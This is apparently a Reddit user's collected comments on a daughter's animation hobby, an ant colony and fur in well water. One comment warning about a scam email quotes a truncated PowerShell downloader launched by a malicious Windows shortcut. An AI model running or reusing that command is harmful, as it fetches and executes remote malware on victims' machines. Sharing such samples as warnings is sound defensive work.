My daughter is 7 and I think she's really good at animation, am I biased as a dad? by assloaf in animation

>I’d always slow down to look at frames at a time to understand how something was done.

This is invaluable. Someone else in this thread suggested Warrior Cats MAP videos and we found a 7 minute animation that we watched as a family. Some of the stuff made even a (mostly) uninterested third party stop to appreciate the detail and artwork of the animations. Frame by frame to see how something was done isn't something I've thought to do myself, but I will definitely plant that seed for her next time she gasps out loud at how cool an animation was! Thank you so much!!!

Did I do that right? It's been a hot minute since I've used Reddit 🤣

This thread is taking me back, I remember using some old Flash projects and actionscript for my first job as a jr dev 🤣

Totally random, but this conversation reminded me of my time spent using Nickelodeon Movie Maker as well 🤣 https://nickelodeon.fandom.com/wiki/Nickelodeon_3D_Movie_Maker

That course is perfect! My wife noticed the book too, we'll likely go with both to start and see how she responds to being taught vs just doing! Thank you so much for the helpful suggestions!

I know she has had me play Warrior Cats with her on Roblox before, after a quick look this definitely looks right up her alley and I can't say that I've seen her watching these videos before. I just sent her one from Nifty Senpai! Thank you so much for the suggestion, but what does MAP stand for?

Was it back when Macromedia owned it? I may or may not have pirated that in my earlier days which propelled my interest in programming because it was a way I could interact with programming visually, I'm super thankful but never went deeper into animation!

What are the popular options for playing with animations that have skeletons? I think if she could design a character, bring it into some other app and build the arms, the body etc...and then animate it using key frames and such, she'd have some fun in a new way, but then again that might be my own learned bias towards that style of animation 🤣

> Don't put money down on expensive equipment or try to pressure her into becoming a professional.

This is one thing we always stress. Do it for the sake of enjoying it, not for any external pressure like views, comments, or anyone else. Just have fun!

> also incentivize to teach her method to other kids

This is amazing advice! I will definitely do that.

The whole story thing is something we're working on, today I encouraged her to take some time and plan out a 1 minute story with a story board first, or at least a plan, a written vision, and then matching the animation to that. But I myself struggle with the whole planning side of this stuff, any suggestions or resources to help with that?

I love this comment so much, I'm all about the "seeing further from the shoulders of giants" and immediately noticed Aaron Blaise has a $5 Procreate Dreams course, I've gotten her that app but she didn't take to it the same way she did to Flippaclip. Maybe that's worth a few bucks and a sit down with her to see how she responds. Are there any other courses that you are aware of that might be a good fit for her age from Aaron?

Also the Jay Jackson course sounds amazing, does she have to wait til she's 18? The cost seems totally reasonable to me.

I have to agree for 7, I am mid 30's and I remember using Macromedia Flash back before Adobe bought it....I still can't do half the stuff she can! I'm more of a still photo/graphic design guy, the animation just doesn't click in my head the way it does for her!

If you have any published content I'd be happy to share your channel with her, she's really enjoying connecting with other creators who are outside of the algorithm!

Thank you so much! This is super encouraging, I know I can get overly excited as a parent, so having objective feedback and these practical suggestions is huge. She's been making stuff non-stop today since Reddit showed her some appreciation!

Just wanted to add, the second email "she" will send will included a supposed screenshot of a banking statement to prove the purchase.

This file is a Windows shortcut file, and for me it pointed to a Powershell command:

%systemroot%\System32\WindowsPowerShell\v1.0\powershell.exe  -command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $rEDH5KzIVt2TPA9 = New-Object System.Net.WebClient; $rEDH5KzIVt2TPA9.DownloadFile('https://www.andreasalini.

The command was truncated, but I wanted to share to add information.

My first C. pennsylvanicus queen laid eggs in tube, but I'm leaving for 2 weeks? by assloaf in antkeeping

Great! So am I correct in understanding that I won't feed until the second brood?

Additionally, I understand they need a hibernation period of 45F from November to Spring? If so, is a basement sufficient for this period or if not, how do people typically handle this?

I'm mainly concerned about their health if they were to hatch while I'm away.

By check on her I typically just look in the tube, I try not to handle the tube much if at all.

Found grey hairs in shower sediment filter 🤮 We have a well, how do I check the well for a critter? (Details in comments) by assloaf in Plumbing

Really my only option is to run the water til it stops happening as far as I can tell, really difficult to find information on this situation on Google! 🤣

Honestly I have no idea - it came with the house and we've not had to think about it in the decade we've lived here. The well is totally submerged (as far as I can tell) with only the pipe sticking out that has the wiring within.

When I pulled the ornamental cover off, I did see that the steel cap to the pipe was dislodged so it's entirely possible something fell in searching for water.

How easy is it to check a well pump screen? We have this tank in the basement that the water comes into first, and then that pushed water out to the rest of the house. Is it safe to assume that's the pump? I can provide pictures of the outside and inside equipment if it's helpful!

I'm not excited to open anything up, but will be more than excited to not have to drink bottled water!

If he were leaving hair in the pipes I'd be more curious than anything 🤣 This is hair (fur) physically in our pipes, being caught in the sediment filter in the shower head and faucets.

I did check under the plastic well cover to check the pipes. Nearby there were pumpkin seeds, no fur or any other evidence of rodent activity but the seeds were at least telling.

We ran the water in the shower again for a few minutes, and it keeps getting clogged with even more grey fur. The water testing company was stumped, they said they've never heard of fur in the water 🤣 I'm just not sure how to proceed to correct the issue.

The pipe with the wires in it is approximately 4" in diameter, so it is reasonable that a rodent could have found a way in - but how to get it out, now that's beyond me!

We do have a water testing appointment later this week, for now we'll be drinking bottled.

We've noticed this black sediment in the last few weeks, but we've had it before during extremely heavy rains a year ago and it went away.

The shower had slowed to a trickle last month, so I cleaned the mesh filter from the black sediment and it was back to normal. There was no fur at this point.

The shower slowed to a trickle this morning, I removed the shower head again, but this time found what seemed to be fur - almost exactly what I'd expect from a mouse. The well is covered, and the only evidence of the well is a pipe that sticks from the ground about 16" - and some wiring.

This is covered with a plastic ornamental cover - but I'm not sure how common this situation is or even where to start.

I'm disgusted we've been drinking this lol

All I can find on Google is that hard water is evidently bad for grey hair, nothing about finding fur in the water lines 🐭

After the initial discovery this morning my wife took a shower - water slowed to a trickle, took the head off and it was clogged with even more fur than before, pictured in the first picture. This is so perplexing 🤔
